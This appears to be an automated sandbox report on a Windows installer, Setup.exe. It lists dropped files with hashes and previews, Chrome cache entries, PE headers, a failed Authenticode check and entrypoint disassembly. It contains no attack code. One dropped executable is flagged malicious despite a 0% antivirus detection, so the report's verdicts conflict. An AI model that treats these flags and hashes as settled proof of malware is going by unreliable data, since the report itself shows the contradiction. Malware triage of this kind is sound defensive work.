Installer\LZMA\{BF99BD40-5B10-4B93-AA83-429E8C408451}\0.5.1.2\AI_ExePath.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".,.C:\Program Files (x86)

C:\Windows\Installer\MSIA1F4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	420864
Entropy (8bit):	6.50057116169369
Encrypted:	false
SSDEEP:	12288:cl7GrJZsRtP01Ab+biU50unhTzTQWNy7koDG6zT:E7UJaR10A+biU50unhFNyfG6f
MD5:	DAEFCC204211C3D179EACC0C6EE4BCC6
SHA1:	3BFC444A87D30DCC77730AD5BDB65B9593B50925
SHA-256:	D74B55C93E4991AC882AF31978A186A797AC9CDE0C93747094E0422106B8D100
SHA-512:	6AA70B0A48868B3DE1DD0A96835DB024AE325AE3FC5725567D54369B91C20972C1C3B7C8620F2189784010CF44BB6577A75702EF20F71F4EAF75DEAF149492D1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................M...............................................6.............Q....9.........Rich..........PE..L...h.$g.........."....)..........................@..................................l....@..........................................p..8........................;..P...p...............................@............................................text............................... ..`.rdata..*%.......&..................@..@.data....7... ......................@....fptable.....`......."..............@....rsrc...8....p.......$..............@..@.reloc...;.......<...0..............@..B........................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{BF99BD40-5B10-4B93-AA83-429E8C408451}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1989225239819206
Encrypted:	false
SSDEEP:	12:JSbX72Fj7XAlfLIlHuRp7hG7777777777777777777777777ZDHFm7hTF87U0l33:JpUIwCI7hq79l3pDrF
MD5:	7A03E24C74FE0BABA5615CAC3E6516E0
SHA1:	64815A77554F7EF02F4FDF165557F161E1C20D89
SHA-256:	CDF73185381373391DBC5CD442B6003B499C8DB00B3DD6BFB9E25609D7E11A65
SHA-512:	1B7C6D8A424AEFCB9127BE025D50DE91521905AA441970952AD4ED0C8328A14D419F9295E233C848BB6E8F1FF5A78ABD874624D0CF1256EDB76B573283986F21
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.670491087234506
Encrypted:	false
SSDEEP:	48:I8PhCuRc06WX4mFT5CZvgiAdKQ2p2WSkdKxVAEkrCy7FDzHoRdKvSkdK1Tq8nr:XhC1WFTSvNhExeRCkPvEkyr
MD5:	8B055EEB504E26C0E120C74BC699B48D
SHA1:	0191E46B24F5087232FA788F2FFB76DCF8D14202
SHA-256:	AD1A0A46D9B971FB1A449D06DC23492DD75E83CC5F7571D8391F1045BC96D369
SHA-512:	8650D145271CE05B03B2F54E161960D80FC30C3473A06566AE0E550E37DCF97FB2AB22CA489EA993757DEB55825C22B85AB27771590748B38B3A982575F28C04
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	364484
Entropy (8bit):	5.365495705965734
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauZ:zTtbmkExhMJCIpEm
MD5:	EF1FBF5CB2B4F93DA1D0C113096AA2DA
SHA1:	A5B012E74A38C6A6AE44707102884A80A4F7857D
SHA-256:	969B6011C35309E409C1745BCC14910A65069B9E7AC52DDD012D7240EB34720D
SHA-512:	585200932D6C4CA90530B6E8C3BE25332BFDF651C838E996CE0E38F8F20BF7B330DB1C325DD91196B5C58BE0DF7CFD89A415E8799AE7FACC6F19E88205340E04
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF0115CFCF708FB3D0.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF20B1D319BAC988B8.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.1768285624844966
Encrypted:	false
SSDEEP:	48:XnrzHT4dKvSkdK4dKQ2p2WSkdKxVAEkrCy7FDzHoldg9N:XrzdvEZhExeRCkIo
MD5:	420C42C0F0F78AEAE62980104DF50563
SHA1:	04497870C9EF56129ED965FF5370FBE3DB66F90E
SHA-256:	0EB9695D20866F3116C616673B2A8253C691F4709902C1C987C9DD36E5150CB0
SHA-512:	D78365B4B8970C70908F383CEE94092B0A166B7F3D5348B472DC3CFC8833A3B9D0EE7F41E00C465D8E4760504F5D9FD993E43179FBDE13A8F4C2BD298FAA2255
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF503E3B12E2F5270B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.3290961657083038
Encrypted:	false
SSDEEP:	48:RVKu8EthPIFX4nT53mxZvgiAdKQ2p2WSkdKxVAEkrCy7FDzHoRdKvSkdK1Tq8nr:fK+IkT56vNhExeRCkPvEkyr
MD5:	34C3EFABD183F496DFE170A87163DBD7
SHA1:	9C6E32CE4CD3BC7E68446D9987D8749885120463
SHA-256:	0724A3A565493EEE37C057ED16907FFA75F27885CEEAA752EDF7CDC59A9B4916
SHA-512:	B7622A8CFBEBD5A9528223A2F3183CB34B7B983DFF9D105590C8BCC4AAE8A300CC60B7786ACE32427E2E71D0E7130EB3C492B7F9B584D75DBBEC627AD26B19E6
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5F60C2218C39130A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.670491087234506
Encrypted:	false
SSDEEP:	48:I8PhCuRc06WX4mFT5CZvgiAdKQ2p2WSkdKxVAEkrCy7FDzHoRdKvSkdK1Tq8nr:XhC1WFTSvNhExeRCkPvEkyr
MD5:	8B055EEB504E26C0E120C74BC699B48D
SHA1:	0191E46B24F5087232FA788F2FFB76DCF8D14202
SHA-256:	AD1A0A46D9B971FB1A449D06DC23492DD75E83CC5F7571D8391F1045BC96D369
SHA-512:	8650D145271CE05B03B2F54E161960D80FC30C3473A06566AE0E550E37DCF97FB2AB22CA489EA993757DEB55825C22B85AB27771590748B38B3A982575F28C04
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF915FEC7F79EBA3CD.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09586684376651362
Encrypted:	false
SSDEEP:	6:xPLG7iVCnLG7iVrKOzPLHKOm7Aca6FXsvjUjIDl3tlaVky6l3rS:50i8n0itFzDHFm7hTF87U0l3tL3rS
MD5:	2EA0578FC7020A4E14C63AAACD072D0A
SHA1:	6211A55071369883183F782636772F0B9AC3CE23
SHA-256:	F1833689D18FFF0CE6BF8B5824A29DF201202F25B7A633D0F51745136654C6CA
SHA-512:	F7D74636BA8A16DADC4A628C5A77603A0642EAB3D3C1C144F8BCD11B033ADE076F9C77CEF19C40F70023E5D0AE826DDB3B2205FB80938BACA44241AC90462F1C
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA25116B68CB87B2F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.670491087234506
Encrypted:	false
SSDEEP:	48:I8PhCuRc06WX4mFT5CZvgiAdKQ2p2WSkdKxVAEkrCy7FDzHoRdKvSkdK1Tq8nr:XhC1WFTSvNhExeRCkPvEkyr
MD5:	8B055EEB504E26C0E120C74BC699B48D
SHA1:	0191E46B24F5087232FA788F2FFB76DCF8D14202
SHA-256:	AD1A0A46D9B971FB1A449D06DC23492DD75E83CC5F7571D8391F1045BC96D369
SHA-512:	8650D145271CE05B03B2F54E161960D80FC30C3473A06566AE0E550E37DCF97FB2AB22CA489EA993757DEB55825C22B85AB27771590748B38B3A982575F28C04
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA53465B7AB5D8A99.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.3290961657083038
Encrypted:	false
SSDEEP:	48:RVKu8EthPIFX4nT53mxZvgiAdKQ2p2WSkdKxVAEkrCy7FDzHoRdKvSkdK1Tq8nr:fK+IkT56vNhExeRCkPvEkyr
MD5:	34C3EFABD183F496DFE170A87163DBD7
SHA1:	9C6E32CE4CD3BC7E68446D9987D8749885120463
SHA-256:	0724A3A565493EEE37C057ED16907FFA75F27885CEEAA752EDF7CDC59A9B4916
SHA-512:	B7622A8CFBEBD5A9528223A2F3183CB34B7B983DFF9D105590C8BCC4AAE8A300CC60B7786ACE32427E2E71D0E7130EB3C492B7F9B584D75DBBEC627AD26B19E6
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB0AD34A60F244415.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBE0D36124341189B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE27B3F957D61AB1F.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.3290961657083038
Encrypted:	false
SSDEEP:	48:RVKu8EthPIFX4nT53mxZvgiAdKQ2p2WSkdKxVAEkrCy7FDzHoRdKvSkdK1Tq8nr:fK+IkT56vNhExeRCkPvEkyr
MD5:	34C3EFABD183F496DFE170A87163DBD7
SHA1:	9C6E32CE4CD3BC7E68446D9987D8749885120463
SHA-256:	0724A3A565493EEE37C057ED16907FFA75F27885CEEAA752EDF7CDC59A9B4916
SHA-512:	B7622A8CFBEBD5A9528223A2F3183CB34B7B983DFF9D105590C8BCC4AAE8A300CC60B7786ACE32427E2E71D0E7130EB3C492B7F9B584D75DBBEC627AD26B19E6
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFED43BC5BB0EAC8A3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF6C65E8850AF63FA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 133

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8554)
Category:	downloaded
Size (bytes):	8559
Entropy (8bit):	5.769334979919426
Encrypted:	false
SSDEEP:	192:OnbDFd66666ri7ObwpSLIMoajcAN6666VGB37ecrJBufcZQfTouDt97ixNSMdK9B:Ybn66666MdSL/pcG6666wZ7TGfvMux9f
MD5:	FC68FEF1F71FB19F6BCC517622860E18
SHA1:	609E68E304EEAD773E996B8802A3A26F67746F30
SHA-256:	94E85C6D7BC90C1D90489F0EDFECAA2F775F9395EFDA96FBEF476E76E85DC525
SHA-512:	0BBF9C7182EB07F0B7DFAAD885832C1D514E66C8AA592158224B33B5D139FD219EE52481C0B60DDD3E3D0277565EAEDD07385CC240227BB624B0BE5A0843416E
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["ripple xrp","apple music replay 2024 artists","an asteroid hitting earth","college basketball picks","concernedape","chicago fire","infinity nikki codes","usc trojans football"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWJ6czF2X2swEjlFcmljIEJhcm9uZSDigJQgQW1lcmljYW4gdmlkZW8gZ2FtZSBkZXNpZ25lciBhbmQgbXVzaWNpYW4y7w9kYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0F3RUJBUUFBQUFBQUFBQUFBQUFFQmdFREJ3VUNBUC9FQURVUUFBRURBd01EQXdFRkJ3VUFBQUFBQUFFQ0F3UUFCUkVTSVRFR1FWRVRJbUdSQjNHaHNmRVVKR

Chrome Cache Entry: 134

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 135

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	134253
Entropy (8bit):	5.44167669373471
Encrypted:	false
SSDEEP:	3072:fkkX33ov7GsG688fJbk/5xnsZLWjwR2i6o:ff3lr6t2/5xnsZawR8o
MD5:	D68ED79461328CDCF46BD1312353AC6B
SHA1:	DC0D3B09C836A986304CEDDA6B6CFAA0BB1942BB
SHA-256:	9873F884165BB0EFF9D63DEFC1AA05D488C95DCFD60FCAE61E432FA5327A61EB
SHA-512:	9BA8135147B8095CC928E0FA690FF5C7957DF51F1003EC9C0615E3A53D42108C17A0646A92C756F275451EC1B8DA15B08D42A7E026B32881E938E3073F7B1831
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.7117867221137555
TrID:	Win32 Executable (generic) a (10002005/4) 98.81% Windows ActiveX control (116523/4) 1.15% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Setup.exe
File size:	7'492'602 bytes
MD5:	6de99ee6752927e6a33373893d2cfc05
SHA1:	244dab1f7d21b8e340a1af09bd202427e7319076
SHA256:	080a5667b9dc8aa2362528f5e1dd5ddfcd5064301f995f52095c90def8748915
SHA512:	2edf1434d23522c2e09ccf4baadafcdd20c40f7459207f2d064a41f4aee55ae7e1f0b07815714e0712d9b6f2f3b81e9c3d23cafcb67dca1c59f46ae2166959a8
SSDEEP:	98304:HmrMVmrjV7etJjwqLjBBtt2jM2sHNZodMq2W0k3KUBN6TkkHtdQlrh1tyL:HmYVmrjV7et+qXBBtt7kK+N6Tkkol8
TLSH:	48768C21324AC46AE96D01F15A3CEAAB952C6D3B0B7114C7B3EC7D6E1B744C25633E27
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z...4...4...4...1.S.4...2...4...7...4...0...4...1...4...7...4...0...4...5...4...3...4...5.g.4...=...4.......4.......4...6...4

File Icon


Icon Hash:	010905619293c52c

Static PE Info

General

Entrypoint:	0x631f40
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6724E5F5 [Fri Nov 1 14:30:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	bf586bdf1219cc9e9d753db3e77887ee

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft ID Verified CS AOC CA 01, O=Microsoft Corporation, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	31/10/2024 19:20:40 03/11/2024 18:20:40
Subject Chain	CN=Caphyon SRL, O=Caphyon SRL, L=Craiova, C=RO
Version:	3
Thumbprint MD5:	4F0516ED34920CE1F29DE68BA8D34BF1
Thumbprint SHA-1:	2EF3CF1D333A039E69785C2AD56F823183A09787
Thumbprint SHA-256:	38F0283E9E0C06AD8B7A7EEE65ADD29EA83050293D49FD65440ED0FEBECA0DAF
Serial:	330001C7E8480C511B6C73886D00000001C7E8

Entrypoint Preview

Instruction
call 00007FC6C4FFCF6Bh
jmp 00007FC6C4FFC5CDh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FC6C4FFBD27h
jmp 00007FC6C4FFC732h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [007830C0h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [007830C0h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [007830C0h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x380d78	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x393000	0x2faa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x721992	0x3a68
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c3000	0x3068c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x31df5c	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31e000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ed410	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2c7000	0x348	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x37e03c	0x240	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c5e2a	0x2c6000	a02e902e48b9c5494f73112e9640d22a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2c7000	0xbb0a0	0xbb200	6798102479c8b63f2ccfa2a33a1c6af0	False	0.3254138485303941	data	5.06992171128955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x383000	0xd9c0	0x3600	2e826545588f1c0ab47d6b07c66e9fe7	False	0.23423032407407407	dBase III DBT, version number 0, next free block index 2, 1st item "T2x"	4.450625483529651	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x391000	0x70c	0x800	63fe4abd6d3701244615e58199fb6cec	False	0.4140625	data	4.654951606118855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fptable	0x392000	0x80	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x393000	0x2faa0	0x2fc00	0923f23d9185253c3a6cc4fbd751cff3	False	0.11490203697643979	data	5.12680650412847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c3000	0x3068c	0x30800	f3d612844f8933d1f3a74dc9fc733534	False	0.47990999516752575	data	6.571785001727403	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x393910	0x13e	Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors	English	United States	0.25471698113207547
RT_BITMAP	0x393a50	0x828	Device independent bitmap graphic, 32 x 16 x 32, image size 0	English	United States	0.03017241379310345
RT_BITMAP	0x394278	0x48a8	Device independent bitmap graphic, 290 x 16 x 32, image size 0	English	United States	0.11881720430107527
